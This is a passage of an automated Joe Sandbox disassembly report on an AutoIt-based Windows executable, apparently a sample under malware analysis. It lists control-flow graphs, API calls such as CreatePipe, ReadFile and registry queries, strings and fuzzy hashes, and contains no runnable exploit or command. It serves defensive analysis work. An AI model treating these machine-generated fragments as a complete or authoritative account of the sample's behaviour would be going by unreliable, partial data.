        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: D%+$D%+$D%+$D%+$D%+D%+$Variable must be of type 'Object'.
        • API String ID: 0-1976735700
        • Opcode ID: 6fea1e5e91fba785570e32129801724ba90109bb3f667deff5aaaeecfd47226f
        • Instruction ID: 92b957664597a62ffc2c1b598fed72116938326f74e96519207aa0089ab75ff1
        • Opcode Fuzzy Hash: 6fea1e5e91fba785570e32129801724ba90109bb3f667deff5aaaeecfd47226f
        • Instruction Fuzzy Hash: E0C29C71A00A45CFCB28CF99C884AADB7F1FF18300F258169E956AB391D371EE51CB91

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1371 1fe763-1feb88 call 1e7510 call 1fedcd call 1ecfa0 1378 23e9f3-23ea00 1371->1378 1379 1feb8e-1feb98 1371->1379 1382 23ea02 1378->1382 1383 23ea05-23ea14 1378->1383 1380 1feb9e-1feba3 1379->1380 1381 23edda-23ede8 1379->1381 1386 23ea21-23ea23 1380->1386 1387 1feba9-1febb5 call 1e9b47 1380->1387 1384 23edea 1381->1384 1385 23eded 1381->1385 1382->1383 1388 23ea16 1383->1388 1389 23ea19 1383->1389 1384->1385 1390 23edf4-23edfd 1385->1390 1394 23ea2c 1386->1394 1387->1394 1396 1febbb-1febc8 call 1eb567 1387->1396 1388->1389 1389->1386 1392 23ee02 1390->1392 1393 23edff 1390->1393 1398 23ee0b-23ee5a call 1ecfa0 call 1fed33 * 2 1392->1398 1393->1392 1397 23ea36 1394->1397 1404 1febd0-1febd9 1396->1404 1402 23ea3e-23ea41 1397->1402 1430 1fed05-1fed1a 1398->1430 1439 23ee60-23ee72 call 1e9b47 1398->1439 1405 1fec7d-1fec94 1402->1405 1406 23ea47-23ea6f call 204963 call 1e6270 1402->1406 1408 1febdd-1febfb call 204a28 1404->1408 1412 23edc3-23edc6 1405->1412 1413 1fec9a 1405->1413 1449 23ea71-23ea75 1406->1449 1450 23ea9c-23eac0 call 1e62b5 call 1e988f 1406->1450 1421 1febfd-1fec06 1408->1421 1422 1fec0a 1408->1422 1417 23eeb0-23eee8 call 1ecfa0 call 1fed33 1412->1417 1418 23edcc-23edcf 1412->1418 1419 23ed6e-23ed8f call 1ecfa0 1413->1419 1420 1feca0-1feca3 1413->1420 1417->1430 1475 23eeee-23ef00 call 1e9b47 1417->1475 1418->1398 1427 23edd1-23edd4 1418->1427 1419->1430 1442 23ed95-23eda7 call 1e9b47 1419->1442 1428 1feca9-1fecac 1420->1428 1429 23eb98-23ebb2 call 1fed33 1420->1429 1421->1408 1433 1fec08 1421->1433 1422->1397 1435 1fec10-1fec21 1422->1435 1427->1381 1427->1430 1431 23eb39-23eb4f call 1e9c6e 1428->1431 1432 1fecb2-1fecb5 1428->1432 1460 23ebb8-23ebbb 1429->1460 1461 23ecfe-23ed24 call 1ecfa0 1429->1461 1444 23ef38-23ef3e 1430->1444 1445 1fed20-1fed30 call 1ecfa0 1430->1445 1431->1430 1478 23eb55-23eb6b call 1e9b47 1431->1478 1440 1fecbb-1fecdd call 1ecfa0 1432->1440 1441 23eac5-23eac8 1432->1441 1433->1435 1435->1381 1443 1fec27-1fec41 1435->1443 1466 23ee74-23ee7c 1439->1466 1467 23ee9e-23eeab call 1eb567 1439->1467 1440->1430 1482 1fecdf-1fecf1 call 1e9b47 1440->1482 1441->1381 1457 23eace-23eae3 call 1e9c6e 1441->1457 1485 23edb4 1442->1485 1486 23eda9-23edb2 call 1eb567 1442->1486 1443->1402 1456 1fec47-1fec79 call 1fed33 call 1ecfa0 1443->1456 1444->1404 1462 23ef44 1444->1462 1449->1450 1464 23ea77-23ea9a call 1e49bd 1449->1464 1450->1441 1456->1405 1457->1430 1502 23eae9-23eaff call 1e9b47 1457->1502 1473 23ec2e-23ec4d call 1ecfa0 1460->1473 1474 23ebbd-23ebc0 1460->1474 1461->1430 1505 23ed2a-23ed3c call 1e9b47 1461->1505 1462->1381 1464->1449 1464->1450 1480 23ee7e-23ee82 1466->1480 1481 23ee8d-23ee98 call 250041 1466->1481 1518 23ef31-23ef33 1467->1518 1473->1430 1526 23ec53-23ec65 call 1e9b47 1473->1526 1488 23ebc6-23ebe3 call 1ecfa0 1474->1488 1489 23ef49-23ef57 1474->1489 1522 23ef02-23ef0a 1475->1522 1523 23ef24-23ef2d call 1eb567 1475->1523 1511 23eb6d-23eb7a call 1e7510 1478->1511 1512 23eb7c-23eb85 call 1e7510 1478->1512 1480->1481 1495 23ee84-23ee88 1480->1495 1481->1467 1530 23ef7a-23ef88 1481->1530 1531 1fecf7-1fed03 1482->1531 1532 23eb29-23eb32 call 1eb567 1482->1532 1501 23edb8-23edbe 1485->1501 1486->1501 1488->1430 1534 23ebe9-23ebfb call 1e9b47 1488->1534 1508 23ef59 1489->1508 1509 23ef5c-23ef6c 1489->1509 1515 23ef10-23ef12 1495->1515 1501->1430 1544 23eb01-23eb0a call 1eb567 1502->1544 1545 23eb0c-23eb1a call 1e7510 1502->1545 1549 23ed3e-23ed4b call 1eb567 1505->1549 1550 23ed4d 1505->1550 1508->1509 1513 23ef71-23ef75 1509->1513 1514 23ef6e 1509->1514 1553 23eb88-23eb93 call 1e6b57 1511->1553 1512->1553 1513->1445 1514->1513 1515->1430 1518->1430 1535 23ef17-23ef22 call 250041 1522->1535 1536 23ef0c 1522->1536 1523->1518 1526->1430 1552 23ec6b-23ec74 call 1e9b47 1526->1552 1541 23ef8a 1530->1541 1542 23ef8d-23ef90 1530->1542 1531->1430 1532->1431 1565 23ec0e 1534->1565 1566 23ebfd-23ec0c call 1eb567 1534->1566 1535->1523 1535->1530 1536->1515 1541->1542 1542->1390 1573 23eb1d-23eb24 1544->1573 1545->1573 1560 23ed51-23ed58 1549->1560 1550->1560 1578 23ec87 1552->1578 1579 23ec76-23ec85 call 1eb567 1552->1579 1553->1430 1568 23ed64 call 1e30f2 1560->1568 1569 23ed5a-23ed5f call 1e3837 1560->1569 1575 23ec12-23ec1d call 208fc4 1565->1575 1566->1575 1577 23ed69 1568->1577 1569->1430 1573->1430 1575->1381 1589 23ec23-23ec29 1575->1589 1577->1430 1584 23ec8b-23ecae 1578->1584 1579->1584 1587 23ecb0-23ecb7 1584->1587 1588 23ecbc-23ecbf 1584->1588 1587->1588 1590 23ecc1-23ecca 1588->1590 1591 23eccf-23ecd2 1588->1591 1589->1430 1590->1591 1592 23ece2-23ece5 1591->1592 1593 23ecd4-23ecdd 1591->1593 1592->1430 1594 23eceb-23ecf9 1592->1594 1593->1592 1594->1430
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
        • API String ID: 0-4285391669
        • Opcode ID: 054cf612f8eccdfffd63abc68633b912ce07b3dadf65ab07365b3d04812fd849
        • Instruction ID: 0e50d76f5a70b8dda8764c285d765c63afba861c4f1f62dfecb3dbb17240e381
        • Opcode Fuzzy Hash: 054cf612f8eccdfffd63abc68633b912ce07b3dadf65ab07365b3d04812fd849
        • Instruction Fuzzy Hash: F8625AB05183858FC724CF24D094AAEBBE1FF88304F15895EE5998B3A1DB71D959CF82

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1631 2504d2-2504ed 1632 250517-25051a 1631->1632 1633 2504ef-250500 GetStdHandle 1631->1633 1636 25053d-25054d GetStdHandle 1632->1636 1637 25051c-250523 1632->1637 1634 250506-250512 call 250371 1633->1634 1635 25059d 1633->1635 1643 25059f 1634->1643 1635->1643 1640 250554-250577 CreateFileW 1636->1640 1641 25054f-250552 1636->1641 1638 250525-250536 CreatePipe 1637->1638 1639 2505a1-2505a4 1637->1639 1644 25057d-25058c call 250371 1638->1644 1645 250538-25053b 1638->1645 1640->1635 1646 250579-25057b 1640->1646 1641->1634 1641->1640 1643->1639 1650 250596-25059b 1644->1650 1651 25058e-250590 CloseHandle 1644->1651 1645->1639 1646->1635 1646->1644 1650->1643 1651->1650
        APIs
        • GetStdHandle.KERNEL32(0000000C), ref: 002504F2
        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 0025052E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateHandlePipe
        • String ID: nul
        • API String ID: 1424370930-2873401336
        • Opcode ID: a4bb7dc3fe840f9569867e1aaa2cede2b22bdda7c354d7e0120ebd9ca4af2411
        • Instruction ID: 81041f22f93feefc9b815eaa1ede6941fcb9eae0525c4070207d2fbc7b3da34d
        • Opcode Fuzzy Hash: a4bb7dc3fe840f9569867e1aaa2cede2b22bdda7c354d7e0120ebd9ca4af2411
        • Instruction Fuzzy Hash: 47219471910306AFDB209F39DC88A9A77B4BF44725F604A19FCA5E71E0E7709968CF24

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1652 2505a7-2505c2 1653 2505c4-2505d4 GetStdHandle 1652->1653 1654 2505eb-2505ed 1652->1654 1655 25066f 1653->1655 1656 2505da-2505e6 call 250371 1653->1656 1657 250610-25061f GetStdHandle 1654->1657 1658 2505ef-2505f6 1654->1658 1661 250671 1655->1661 1656->1661 1659 250626-250649 CreateFileW 1657->1659 1660 250621-250624 1657->1660 1663 250673-250676 1658->1663 1664 2505f8-250609 CreatePipe 1658->1664 1659->1655 1667 25064b-25064d 1659->1667 1660->1656 1660->1659 1661->1663 1665 25064f-25065e call 250371 1664->1665 1666 25060b-25060e 1664->1666 1671 250660-250662 CloseHandle 1665->1671 1672 250668-25066d 1665->1672 1666->1663 1667->1655 1667->1665 1671->1672 1672->1661
        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 002505C6
        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00250601
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateHandlePipe
        • String ID: nul
        • API String ID: 1424370930-2873401336
        • Opcode ID: 552c0023565ad641def1989e8167c40a6c9f659de7cd621944437e655d90ffd1
        • Instruction ID: bc13313645baa94e1309151fa493ec1da3e16e72e1d1eb7f96464dba0c9724e6
        • Opcode Fuzzy Hash: 552c0023565ad641def1989e8167c40a6c9f659de7cd621944437e655d90ffd1
        • Instruction Fuzzy Hash: 8D21B5355103069BDB209F79DC84A5A77E8BF85721F200A19FCA1E32E0D7B09974CB14

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1683 1e2c63-1e2cd3 CreateWindowExW * 2 ShowWindow * 2
        APIs
        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2C91
        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2CB2
        • ShowWindow.USER32(00000000,?,?,?,?,?,?,001E1CAD,?), ref: 001E2CC6
        • ShowWindow.USER32(00000000,?,?,?,?,?,?,001E1CAD,?), ref: 001E2CCF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$CreateShow
        • String ID: AutoIt v3$edit
        • API String ID: 1584632944-3779509399
        • Opcode ID: 0d2651187aca66567ecf42d7b4f7c200439f8d070911ad4edf13a729d953178a
        • Instruction ID: 90b3c9a987991f78fe84024200092a8fa8afbdf3911b083bf7c87b82b163c76c
        • Opcode Fuzzy Hash: 0d2651187aca66567ecf42d7b4f7c200439f8d070911ad4edf13a729d953178a
        • Instruction Fuzzy Hash: E1F03A75540290BAEB300723BC1CE776EBDD7C6F50B64419EFA04A21A0E6711860DBB0

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1684 2507ef-250818 InterlockedExchange 1685 250826-25084f call 1ffe0b ReadFile 1684->1685 1686 25081a-25081b call 1ffe0b 1684->1686 1691 250855-250859 1685->1691 1692 250907-25090b 1685->1692 1689 250820-250821 1686->1689 1689->1685 1693 250901-250904 1691->1693 1694 25085f-250874 EnterCriticalSection 1691->1694 1695 25090d-250910 call 1ffe14 1692->1695 1696 25091a-250929 InterlockedExchange 1692->1696 1693->1692 1697 250876-250885 1694->1697 1698 2508c2-2508fb call 200e20 LeaveCriticalSection ReadFile 1694->1698 1703 250915-250919 1695->1703 1701 250887 1697->1701 1702 25088d-2508bf call 2220b0 call 1ffe0b call 200e20 call 1ffe14 1697->1702 1698->1691 1698->1693 1701->1702 1702->1698 1703->1696
        APIs
        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0025080C
        • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00250847
        • EnterCriticalSection.KERNEL32(?), ref: 00250863
        • LeaveCriticalSection.KERNEL32(?), ref: 002508DC
        • ReadFile.KERNELBASE(?,?,0000FFFF,00000000,00000000), ref: 002508F3
        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00250921
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
        • String ID:
        • API String ID: 3368777196-0
        • Opcode ID: 0125a0881bf10ed92f39f93ba0788a9b8c73963f0dac4fe5be38458e7ef26171
        • Instruction ID: 23cb2bf810ad37e3e92a0f5aeec90dbea3e2841ac56ecb0b4d81a9b825d49e84
        • Opcode Fuzzy Hash: 0125a0881bf10ed92f39f93ba0788a9b8c73963f0dac4fe5be38458e7ef26171
        • Instruction Fuzzy Hash: E6417C71910205EBDF14AF64DCC9AAA7778FF04310F1440A9ED04AE297DB70DE65DBA4
        APIs
        • CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250324
        • CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250331
        • CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 0025033E
        • CloseHandle.KERNELBASE(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 0025034B
        • CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250358
        • CloseHandle.KERNEL32(?,?,?,?,0025017D,?,002532FC,?,00000001,00222592,?), ref: 00250365
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 7e48d249c5f6adfa48dd5dd509ad85ddc703ea426d83b8a7fd7c2311fe3087b7
        • Instruction ID: 760ccf41337c8c0b817cac90606ca2c3b06b1ae015fd01ae80b12620956b81da
        • Opcode Fuzzy Hash: 7e48d249c5f6adfa48dd5dd509ad85ddc703ea426d83b8a7fd7c2311fe3087b7
        • Instruction Fuzzy Hash: 3F019072810B16AFC730AF66DCC0416F7F5BF503163158A7ED19652931C371A968CE84
        APIs
        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B40
        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B61
        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B83
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseOpenQueryValue
        • String ID: Control Panel\Mouse
        • API String ID: 3677997916-824357125
        • Opcode ID: 8bb8bc68d67f69abd5c0d97f9408154b868026a1f04b4b492a7188fbca964e8d
        • Instruction ID: ed7f48f8de5b380796fae3cc3a26e4285a5417be473d37cb5a6c69117c5fdfcb
        • Opcode Fuzzy Hash: 8bb8bc68d67f69abd5c0d97f9408154b868026a1f04b4b492a7188fbca964e8d
        • Instruction Fuzzy Hash: 5A112AB5510648FFDB218FA6DC48AAFB7B8EF44744B144559E816D7210D3319E4097A0
        APIs
        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002233A2
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E3A04
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconLoadNotifyShell_String_wcslen
        • String ID: Line:
        • API String ID: 2289894680-1585850449
        • Opcode ID: 1ce3b57be5041a8d86d5162e2c2d06674fa8dd888aa761c618f60e2847feaaaf
        • Instruction ID: e701a13728f494e9079c011198ac6eb75f7fe937358e89390c2776417b92c806
        • Opcode Fuzzy Hash: 1ce3b57be5041a8d86d5162e2c2d06674fa8dd888aa761c618f60e2847feaaaf
        • Instruction Fuzzy Hash: 7A310271408780AAC324EB21EC49BEFB3D8AF50310F50066AF5A983091EB709A58C7C2
        APIs
        • GetOpenFileNameW.COMDLG32(?), ref: 00222C8C
          • Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2
          • Part of subcall function 001E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001E2DC4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Name$Path$FileFullLongOpen
        • String ID: X$`e*
        • API String ID: 779396738-1794627178
        • Opcode ID: 2d6a448740cceaa7948d17095770de3cd0df32bcc83ff3073b97e8c73f9ce8c0
        • Instruction ID: 2ae9c4aa14a8b0d81faa5a8743adb6b32ae0ca0e31db1468ee8acd0d41e0617c
        • Opcode Fuzzy Hash: 2d6a448740cceaa7948d17095770de3cd0df32bcc83ff3073b97e8c73f9ce8c0
        • Instruction Fuzzy Hash: 2321D570A10298AFCB01DF95D809BEE7BFCAF59304F04405AE515B7241DBB45A998FA1
        APIs
        • __CxxThrowException@8.LIBVCRUNTIME ref: 00200668
          • Part of subcall function 002032A4: RaiseException.KERNEL32(?,?,?,0020068A,75912E40,?,?,?,?,?,?,?,0020068A,?,002A8738), ref: 00203304
        • __CxxThrowException@8.LIBVCRUNTIME ref: 00200685
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Exception@8Throw$ExceptionRaise
        • String ID: Unknown exception
        • API String ID: 3476068407-410509341
        • Opcode ID: 51642517bfb61346e03da3dd89ea3ddaa92573d3e2b0ac631c6c7beddf3aa3b6
        • Instruction ID: ea3e6aba5d9e219bbb2e7aeee471fce2015e96d5152dd06e34e01b60007f3185
        • Opcode Fuzzy Hash: 51642517bfb61346e03da3dd89ea3ddaa92573d3e2b0ac631c6c7beddf3aa3b6
        • Instruction Fuzzy Hash: 11F0223492030D7BDB00BAA4DC86EAE7B6D6E01310F604135FA14825D3EFB2EA36CD80
        APIs
          • Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1BF4
          • Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001E1BFC
          • Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E1C07
          • Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E1C12
          • Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001E1C1A
          • Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001E1C22
          • Part of subcall function 001E1B4A: RegisterWindowMessageW.USER32(00000004,?,001E12C4), ref: 001E1BA2
        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001E136A
        • OleInitialize.OLE32 ref: 001E1388
        • CloseHandle.KERNEL32(00000000,00000000), ref: 002224AB
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
        • String ID:
        • API String ID: 1986988660-0
        • Opcode ID: 8d46c84c2f9300299f898f5394f9f0e319473c0978bacd41f8633d012e24e874
        • Instruction ID: c342acb58dc9d9d0b5bc74cd97f62c9c9e2b805757f8252ad56e75b8791a1ce9
        • Opcode Fuzzy Hash: 8d46c84c2f9300299f898f5394f9f0e319473c0978bacd41f8633d012e24e874
        • Instruction Fuzzy Hash: B7719DB49216408ED3A4DF7ABC6D6A93BE4FB983843E4832ED50AC7261EB305475CF51
        APIs
          • Part of subcall function 001E3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E3A04
        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0024C259
        • KillTimer.USER32(?,00000001,?,?), ref: 0024C261
        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0024C270
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconNotifyShell_Timer$Kill
        • String ID:
        • API String ID: 3500052701-0
        • Opcode ID: 25d2c4ca5ea36d81c1f28aba061d975ee97c8db2967c8fed94b44eb09ca7ead1
        • Instruction ID: afbf88e16003e0680c80cf692d533557f165a5702745c0514e46042af3277130
        • Opcode Fuzzy Hash: 25d2c4ca5ea36d81c1f28aba061d975ee97c8db2967c8fed94b44eb09ca7ead1
